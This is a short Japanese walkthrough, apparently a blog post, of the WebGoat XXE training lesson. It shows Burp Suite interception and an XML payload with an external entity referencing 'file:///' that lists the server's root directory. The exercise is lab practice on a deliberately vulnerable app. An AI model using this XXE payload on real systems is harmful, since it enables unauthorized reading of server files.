Hello there, ('ω')ノ

 

WebGOATでXXE⓷を選択して。

フォームに送信するときに、コメントフィールドにXXEインジェクションを実行して。

ファイルシステムのルートディレクトリをリストしてみてくださいと。

まずは、動作確認を。

 

 

Burp Suiteでリクエストを確認して。

 

 

リクエスト内容を下記のようにXMLに変更して。

リピータでレスポンスを確認して。

 

<?xml version="1.0"?>
<!DOCTYPE comment [
<!ENTITY test SYSTEM "file:///">
]>
<comment><text>&test;</text></comment>

 

 

実行すると、ルートディレクトリを取得できたようで。

 

 

念のため確認を。

 

 

Best regards, (^^ゞ